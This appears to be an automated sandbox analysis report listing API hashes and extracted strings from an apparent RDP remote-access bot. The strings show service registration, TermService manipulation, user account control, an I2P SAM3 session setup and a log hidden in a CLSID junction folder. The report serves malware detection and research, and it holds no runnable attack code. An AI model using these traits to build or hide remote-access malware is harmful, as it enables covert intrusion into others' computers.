                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: 3c9f990b9a47e33ded08a4b529be2ee697f664180362654706160e751e935eaf
                                    • Instruction ID: 08f258ce8120e84896defbeec13d85be31fe868c10dae2c316312135c259a75a
                                    • Opcode Fuzzy Hash: 3c9f990b9a47e33ded08a4b529be2ee697f664180362654706160e751e935eaf
                                    • Instruction Fuzzy Hash: E1718CA9E1C6C386FAA35F35ECCC3BD1241AF85784F5C01B2D9CE6A695DE2CE9458301
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                    • String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                    APIs
                                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD68B7
                                    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD68F0
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD69C5
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD6AAA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD6C1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                    • API String ID: 1423203057-455140666
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: OpenQueryValuefflushfwrite
                                    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                    • API String ID: 1980715187-910542497
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
                                    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                    • API String ID: 871770459-375624272
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                    • API String ID: 2122475568-588975189
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                    • API String ID: 546114577-3142219161
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                    • API String ID: 610085118-1825955162
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                    • API String ID: 1721699506-2819899730
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CompareCriticalEnterFileSectionTime
                                    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                    • API String ID: 3718746087-844192579
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
                                    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                    • API String ID: 2654219296-2700516951
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strcpystrlen$strcmp
                                    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                    • API String ID: 245486318-5999096
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                    • API String ID: 3562457520-1478336053
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • API ID: Heap$Process$AllocFreestrcpystrlen
                                    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • API ID: strlen
                                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                                    • String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                                    • API String ID: 3179112426-2019511216
